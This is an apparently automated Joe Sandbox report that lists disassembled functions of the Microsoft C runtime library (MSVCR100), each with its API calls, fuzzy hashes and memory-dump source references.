                                                                                                            • Part of subcall function 6FD92144: free.MSVCR100(00000000,00000000,00000000,7650DFF0), ref: 6FD921D2
                                                                                                          • free.MSVCR100(00000000,?,00000000,?,00000007,00000007,?,6FDB0814,?,00007FFF,?,6FD91D0C,?,6FD91D28,00000010), ref: 6FDFEF21
                                                                                                            • Part of subcall function 6FD8014E: HeapFree.KERNEL32(00000000,00000000,?,6FDA7602,00000000), ref: 6FD80164
                                                                                                          • free.MSVCR100(00000000,?,00000000,?,00000007,00000007,?,6FDB0814,?,00007FFF,?,6FD91D0C,?,6FD91D28,00000010), ref: 6FDFEF42
                                                                                                          Similarity
                                                                                                          • API ID: free$ByteCharMultiWide$FreeHeap_calloc_crt_mbschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1824706361-0
                                                                                                          • Opcode ID: c7ebc336a6d700fb094a8096529ac2b64b5b61f7baf0237e1cb75a17aaeeeb48
                                                                                                          • Instruction ID: 506b93f1aa2eea9a42569ce3447a9d2e63bcf4e0b966bcc983c92e8d9b2f0e0e
                                                                                                          • Opcode Fuzzy Hash: c7ebc336a6d700fb094a8096529ac2b64b5b61f7baf0237e1cb75a17aaeeeb48
                                                                                                          • Instruction Fuzzy Hash: DC11607291B626FA9B5187A69D44CCF7FACEF067747210256F028D3190EB30B981C6A0
                                                                                                          APIs
                                                                                                          • strcpy_s.MSVCR100(6FE283D0,0000000E,6FDB3024,6FE283F4,00000012,00000000,?,6FDD6A3B,?,6FDD6B18,00000010,6FDD6B6A,00000000,?,00000002,7FFFFFFF), ref: 6FDD68D1
                                                                                                          • _ultoa_s.MSVCR100(00000000,6FE283D2,6FE283D0,00000020), ref: 6FDD6910
                                                                                                          • strcat_s.MSVCR100(6FE283D0,0000000E,6FD86E28), ref: 6FDD6923
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD6934
                                                                                                          Similarity
                                                                                                          • API ID: _invoke_watson_ultoa_sstrcat_sstrcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2909298754-0
                                                                                                          • Opcode ID: 0251c774d7530d4396d4635954778aaa969552267a7e4d59eeb1a81f400fdd5f
                                                                                                          • Instruction ID: cd3cf1c6610207cb904d85981e0cff2a861a3f2d82407b83808d4e3414aab747
                                                                                                          • Opcode Fuzzy Hash: 0251c774d7530d4396d4635954778aaa969552267a7e4d59eeb1a81f400fdd5f
                                                                                                          • Instruction Fuzzy Hash: D2113622A08384AEF7800B388C59F9F3F9DAF53354F054062F9549F2C1E620BD0583E1
                                                                                                          APIs
                                                                                                          • GetFileType.KERNEL32(?,?,?,6FDF8C18,0000000C), ref: 6FDF8B34
                                                                                                          • GetLastError.KERNEL32(?,?,6FDF8C18,0000000C), ref: 6FDF8B3E
                                                                                                          • _dosmaperr.MSVCR100(00000000,?,?,6FDF8C18,0000000C), ref: 6FDF8B45
                                                                                                          • _errno.MSVCR100(?,?,6FDF8C18,0000000C), ref: 6FDF8B75
                                                                                                          • __doserrno.MSVCR100(?,?,6FDF8C18,0000000C), ref: 6FDF8B80
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLastType__doserrno_dosmaperr_errno
                                                                                                          • String ID:
                                                                                                          • API String ID: 1019426309-0
                                                                                                          • Opcode ID: 7ea441bb4bfb9908664a3f3a1e182e0661275cbdf228a7eb087357a9b3f7c2e0
                                                                                                          • Instruction ID: 8ccda24b9dfa316fa1c32a8417383904c13e83670c11fd831c2e266843176316
                                                                                                          • Opcode Fuzzy Hash: 7ea441bb4bfb9908664a3f3a1e182e0661275cbdf228a7eb087357a9b3f7c2e0
                                                                                                          • Instruction Fuzzy Hash: E821FFB154A705EADB818F6AC841B9CBB60AF42328F598745D4708F1D2DB74B282DF92
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000010,6FDC7D43), ref: 6FDC7DE9
                                                                                                          • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100 ref: 6FDC7E06
                                                                                                          • CloseHandle.KERNEL32(?), ref: 6FDC7E86
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6FDC7E8F
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(?), ref: 6FDC7E92
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandle$??3@AcquireConcurrency@@Lock@details@ObjectReaderSingleWaitWrite@_Writer
                                                                                                          • String ID:
                                                                                                          • API String ID: 4257580306-0
                                                                                                          • Opcode ID: a61ce23e61f05fc3be8b78e7781600136724023c0ba933286b59e901706715a6
                                                                                                          • Instruction ID: 31aa18243b30ad2c048fdf4de7d381cf01fe257d4a985e24afc785d2cd177786
                                                                                                          • Opcode Fuzzy Hash: a61ce23e61f05fc3be8b78e7781600136724023c0ba933286b59e901706715a6
                                                                                                          • Instruction Fuzzy Hash: 4421AE32900306DBDB81CF68C88166A77B8BF41320B154659E8649B2D0CB35FD02CBA1
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDFA8F0,00000010), ref: 6FDFA833
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDFA8F0,00000010), ref: 6FDFA83E
                                                                                                          • _errno.MSVCR100(6FDFA8F0,00000010), ref: 6FDFA853
                                                                                                          • _errno.MSVCR100(6FDFA8F0,00000010), ref: 6FDFA86C
                                                                                                          • _errno.MSVCR100(6FDFA8F0,00000010), ref: 6FDFA8BD
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819658684-0
                                                                                                          • Opcode ID: 0c976ea6db579e9b774d43a8e0bdf3c7b82a977da4f3fdfa8a103e1cefc31ac9
                                                                                                          • Instruction ID: 51c045ba05a296ecf47218cd7cfed0a739c1451dc51e645e2c44130fde5bcf1d
                                                                                                          • Opcode Fuzzy Hash: 0c976ea6db579e9b774d43a8e0bdf3c7b82a977da4f3fdfa8a103e1cefc31ac9
                                                                                                          • Instruction Fuzzy Hash: 90218471822749DAE7919F64D884F983760AF01364F524256D830AB2D1CBF8BA83CB61
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_localtime64_s_wasctime_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 3494016602-0
                                                                                                          • Opcode ID: 121e369f062a47d626d2658141d94f0f5d3c49d9dba26209718a8ec66ba2515d
                                                                                                          • Instruction ID: d8361547b5f578fe603a7cca9cf3a377ccec14206c2ce3812bb7065c86d3820b
                                                                                                          • Opcode Fuzzy Hash: 121e369f062a47d626d2658141d94f0f5d3c49d9dba26209718a8ec66ba2515d
                                                                                                          • Instruction Fuzzy Hash: 7011C6B1601314DBDB949FB8C800ADE77B4EF49728F04C2AAF801DB186DB70F54187A5
                                                                                                          APIs
                                                                                                          • _wcsnicoll_l.MSVCR100(?,?,?,00000000), ref: 6FD90AB5
                                                                                                          • _errno.MSVCR100 ref: 6FDAC7B6
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDAC7C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_wcsnicoll_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 1358483507-0
                                                                                                          • Opcode ID: 19f20282754476dda687c42c5f2b5a1534bbc8fcce3d886ff386d5ce08dc4b71
                                                                                                          • Instruction ID: cd2cca9df6ff3858c1fc8050a4b170b4a9f0e63c31b89804c41e0043f8742881
                                                                                                          • Opcode Fuzzy Hash: 19f20282754476dda687c42c5f2b5a1534bbc8fcce3d886ff386d5ce08dc4b71
                                                                                                          • Instruction Fuzzy Hash: 4411B276541355DBEBA04FA8D8443B936A1AB013B1F50525AF8619A2D0DB3AF84086E9
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(?,?,?,6FD9094E,?,6FD90980,0000000C,6FD909B6,Function_00011614,?,?,00000000,?), ref: 6FD90692
                                                                                                          • _isatty.MSVCR100(00000000,?,?,?,6FD9094E,?,6FD90980,0000000C,6FD909B6,Function_00011614,?,?,00000000,?), ref: 6FD90698
                                                                                                          • __p__iob.MSVCR100(?,?,6FD9094E,?,6FD90980,0000000C,6FD909B6,Function_00011614,?,?,00000000,?), ref: 6FDA8A2D
                                                                                                          • _malloc_crt.MSVCR100(00001000,?,?,?,?,6FD9094E,?,6FD90980,0000000C,6FD909B6,Function_00011614,?,?,00000000,?), ref: 6FDA8A71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __p__iob_fileno_isatty_malloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 301265415-0
                                                                                                          • Opcode ID: 0a64a9428aae57c74d2c88c0d3adf96718c9e72284f6ba35ee302d4de9d5dc78
                                                                                                          • Instruction ID: 0a8d68335f32f7bf4cf6f903e64d1d52f78f472b477ac9a6c08f1b5100f8c805
                                                                                                          • Opcode Fuzzy Hash: 0a64a9428aae57c74d2c88c0d3adf96718c9e72284f6ba35ee302d4de9d5dc78
                                                                                                          • Instruction Fuzzy Hash: CD1170B290D742DED3A09FB9D885642B7E8EF553A4B10882AD5EAC7140F771F4808BA4
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(?,6FD92640,00000008), ref: 6FD925C8
                                                                                                          • _lock_file.MSVCR100(?,?,6FD92640,00000008), ref: 6FD925D0
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                            • Part of subcall function 6FD8A595: _fileno.MSVCR100(?,?,?,?,?,?,?,6FD8A830,?), ref: 6FD8A5C4
                                                                                                            • Part of subcall function 6FD8A595: _write.MSVCR100(00000000,?,?,?,?,?,?,6FD8A830,?), ref: 6FD8A5CB
                                                                                                          • _lseek.MSVCR100(00000000,00000000,00000000,?,?,6FD92640,00000008), ref: 6FD9261D
                                                                                                          • _errno.MSVCR100(6FD92640,00000008), ref: 6FDA8E56
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD92640,00000008), ref: 6FDA8E61
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fileno$_errno_invalid_parameter_noinfo_lock_lock_file_lseek_write
                                                                                                          • String ID:
                                                                                                          • API String ID: 2790466172-0
                                                                                                          • Opcode ID: bda241c5c4c78a6b1d2aaf06866fba263034e2b109c15fb234ed166aaee21889
                                                                                                          • Instruction ID: 70749740c6f7114011b80a19c7ce113b7f7d3b8d0558aa977718f55a0c395ab3
                                                                                                          • Opcode Fuzzy Hash: bda241c5c4c78a6b1d2aaf06866fba263034e2b109c15fb234ed166aaee21889
                                                                                                          • Instruction Fuzzy Hash: B2110A72501B40DFE7945FB89C8196E3BA0EF4227DB19C35AE4798F5D0DB38BA418B21
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FD8BE40,0000000C), ref: 6FD8BE66
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD8BE40,0000000C), ref: 6FDA94A7
                                                                                                            • Part of subcall function 6FD8BBE4: _lock.MSVCR100(00000001,6FD8BC30,00000010,6FD8BE02,6FD8BE40,0000000C), ref: 6FD8BBF9
                                                                                                          • _errno.MSVCR100(6FD8BE40,0000000C), ref: 6FDA94B3
                                                                                                          • _errno.MSVCR100(6FD8BE40,0000000C), ref: 6FDA94C0
                                                                                                          • _local_unwind4.MSVCR100(6FE24610,?,000000FE,6FD8BE40,0000000C), ref: 6FDA94D6
                                                                                                            • Part of subcall function 6FD8BCC7: _wsopen_s.MSVCR100(?,?,00000000,?,00000180,00000000,?,?), ref: 6FD8BD91
                                                                                                            • Part of subcall function 6FD8BE5C: _unlock_file.MSVCR100(?,6FD8BE36), ref: 6FD8BE5F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_local_unwind4_lock_unlock_file_wsopen_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 494836370-0
                                                                                                          • Opcode ID: a3106b6d0842844554d72a7adfccb91ad6a2e660f41053f18a8a91637c9bd7e8
                                                                                                          • Instruction ID: 48108a36c0e335a3171a61889cc4fa089ebea5e6bc3b29a03d659371a177e3e1
                                                                                                          • Opcode Fuzzy Hash: a3106b6d0842844554d72a7adfccb91ad6a2e660f41053f18a8a91637c9bd7e8
                                                                                                          • Instruction Fuzzy Hash: 1911A070800309DECBC1AF78CC805AE77A5AF45264F258A12D4349B1D4EB77B980CBB6
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,00000000,?,?,?), ref: 6FDF1007
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000000,?,?,?), ref: 6FDF1012
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _stricmp.MSVCR100(?,?,?,00000000,?,?,?), ref: 6FDF103F
                                                                                                          • __crtCompareStringA.MSVCR100(?,?,00001001,?,000000FF,?,000000FF,?,?,00000000,?,?,?), ref: 6FDF105F
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,00000000,?,?,?), ref: 6FDF106B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$CompareString__crt_invalid_parameter_invalid_parameter_noinfo_stricmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 31590308-0
                                                                                                          • Opcode ID: 92037d80e335ad98972df54530a3e83d5247083e4ca1643a5b1c37eac55df5a6
                                                                                                          • Instruction ID: 02230b134145e16b7fdfb2467538fd40839530dd12c4325e3b8c48b5f0fc395d
                                                                                                          • Opcode Fuzzy Hash: 92037d80e335ad98972df54530a3e83d5247083e4ca1643a5b1c37eac55df5a6
                                                                                                          • Instruction Fuzzy Hash: 02112BB180A389EBDF519FA4C880D9D3B71AF01339B214359E4701A1E4EB32B552EB51
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,00000000,?,?,?), ref: 6FDF0E12
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000000,?,?,?), ref: 6FDF0E1D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strcmp.MSVCR100(?,?,?,00000000,?,?,?), ref: 6FDF0E4A
                                                                                                          • __crtCompareStringA.MSVCR100(?,?,00001000,?,000000FF,?,000000FF,?,?,00000000,?,?,?), ref: 6FDF0E6A
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,00000000,?,?,?), ref: 6FDF0E76
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$CompareString__crt_invalid_parameter_invalid_parameter_noinfostrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 182557437-0
                                                                                                          • Opcode ID: ce5936fabace003cca8b5b5601c6c781875d8d97f6b3aa0f505b9914e22dea4a
                                                                                                          • Instruction ID: 0826a75b449febdce215869b21e5ce7fed640f462e0de23a00b8dd91d065f718
                                                                                                          • Opcode Fuzzy Hash: ce5936fabace003cca8b5b5601c6c781875d8d97f6b3aa0f505b9914e22dea4a
                                                                                                          • Instruction Fuzzy Hash: AC116A72806349EFDF519FA4CC48DAD3B60AF013B8B219359E5721B1E1EB32B592DB50
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDDFE6C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDDFE77
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _stricoll_l.MSVCR100(?,?,?,?), ref: 6FDDFEA5
                                                                                                          • __crtCompareStringA.MSVCR100(?,?,00001001,?,000000FF,?,000000FF,?,?), ref: 6FDDFEC8
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?), ref: 6FDDFED4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$CompareString__crt_invalid_parameter_invalid_parameter_noinfo_stricoll_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 2022759639-0
                                                                                                          • Opcode ID: 3833929afc3fa68242afde968df86a9648e1139df7298521760872d16bd90eb0
                                                                                                          • Instruction ID: 0adf659a44b4e5972c59648c82c5fe1b737125df252a564ef31943bf2dca5e23
                                                                                                          • Opcode Fuzzy Hash: 3833929afc3fa68242afde968df86a9648e1139df7298521760872d16bd90eb0
                                                                                                          • Instruction Fuzzy Hash: 46115872804389EFCF51AFA8CC4089D7B71AF45338B248355F5341A1E2DB32AA95DB91
                                                                                                          APIs
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6FDB079E
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 6FDB07AA
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDB07B2
                                                                                                          • GetTickCount.KERNEL32 ref: 6FDB07BA
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 6FDB07C6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 1445889803-0
                                                                                                          • Opcode ID: bfa2daba3ecb0daed5900bcb96ba172d0cd2259aabb17cf046a2f854df7a2bf1
                                                                                                          • Instruction ID: d0c2028a35e38b497eadfe2683fe40b8aa2c535364f25f9c24ec6d874b125d98
                                                                                                          • Opcode Fuzzy Hash: bfa2daba3ecb0daed5900bcb96ba172d0cd2259aabb17cf046a2f854df7a2bf1
                                                                                                          • Instruction Fuzzy Hash: D61133B6D006249BEF109FB8C54859DF7F8EB49371F561615D915EB204EB70B9508B80
                                                                                                          APIs
                                                                                                          • wcslen.MSVCR100(?,6FD92F60,00000010), ref: 6FD92F44
                                                                                                          • _lock_file.MSVCR100(?,?,6FD92F60,00000010), ref: 6FD92F4F
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                          • _fputwc_nolock.MSVCR100(?,?,?,?,?,?,?,?,6FD92F60,00000010), ref: 6FD92F94
                                                                                                          • _errno.MSVCR100(6FD92F60,00000010), ref: 6FDA86E9
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD92F60,00000010), ref: 6FDA86F4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
• Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_fputwc_nolock_invalid_parameter_noinfo_lock_lock_filewcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1101344634-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_localtime32_s_wasctime_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 453477223-0
                                                                                                          APIs
                                                                                                          • _get_osfhandle.MSVCR100(?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1), ref: 6FDF85BF
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1,?), ref: 6FDF85CC
                                                                                                          • SetFilePointer.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002), ref: 6FDF85E8
                                                                                                          • GetLastError.KERNEL32(?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010), ref: 6FDF85F5
                                                                                                          • _dosmaperr.MSVCR100(00000000,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00), ref: 6FDF8600
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLastPointer_dosmaperr_errno_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 1167104555-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_localtime32_sasctime_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1786148782-0
                                                                                                          APIs
                                                                                                          • _CreateFrameInfo.MSVCR100(00000000,?,6FDF4250,0000002C,6FDF4522,00000000,csm,?,?,6FDB2708,00000100,csm,00000000,?), ref: 6FDF40D5
                                                                                                            • Part of subcall function 6FD9837E: _getptd.MSVCR100 ref: 6FD9838C
                                                                                                            • Part of subcall function 6FD9837E: _getptd.MSVCR100 ref: 6FD9839A
                                                                                                          • _getptd.MSVCR100(6FDF4250,0000002C,6FDF4522,00000000,csm,?,?,6FDB2708,00000100,csm,00000000,?), ref: 6FDF40DF
                                                                                                          • _getptd.MSVCR100(6FDF4250,0000002C,6FDF4522,00000000,csm,?,?,6FDB2708,00000100,csm,00000000,?), ref: 6FDF40ED
                                                                                                          • _getptd.MSVCR100(6FDF4250,0000002C,6FDF4522,00000000,csm,?,?,6FDB2708,00000100,csm,00000000,?), ref: 6FDF40FB
                                                                                                          • _getptd.MSVCR100(6FDF4250,0000002C,6FDF4522,00000000,csm,?,?,6FDB2708,00000100,csm,00000000,?), ref: 6FDF4106
                                                                                                            • Part of subcall function 6FDF41D3: _FindAndUnlinkFrame.MSVCR100(?,6FDF41BF,?), ref: 6FDF41DC
                                                                                                            • Part of subcall function 6FDF41D3: _getptd.MSVCR100(6FDF41BF,?), ref: 6FDF41E2
                                                                                                            • Part of subcall function 6FDF41D3: _getptd.MSVCR100(6FDF41BF,?), ref: 6FDF41F0
                                                                                                            • Part of subcall function 6FDF41D3: _IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6FDF4233
                                                                                                            • Part of subcall function 6FDF41D3: __DestructExceptionObject.MSVCR100(00000000,00000000), ref: 6FDF4241
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$ExceptionFrameObject$CreateDestroyedDestructFindInfoUnlink
                                                                                                          • String ID:
                                                                                                          • API String ID: 2613726750-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfomemcpymemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 77509311-0
                                                                                                          APIs
                                                                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 6FDC0F18
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC0F1F
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC0F38
                                                                                                          • _CxxThrowException.MSVCR100(00000000,6FE20C48,00000000), ref: 6FDC0F47
                                                                                                          • CloseHandle.KERNEL32(?), ref: 6FDC0F4F
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@CloseConcurrency@@ErrorExceptionHandleLastMultipleObjectsThrowWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 3700427873-0
                                                                                                          APIs
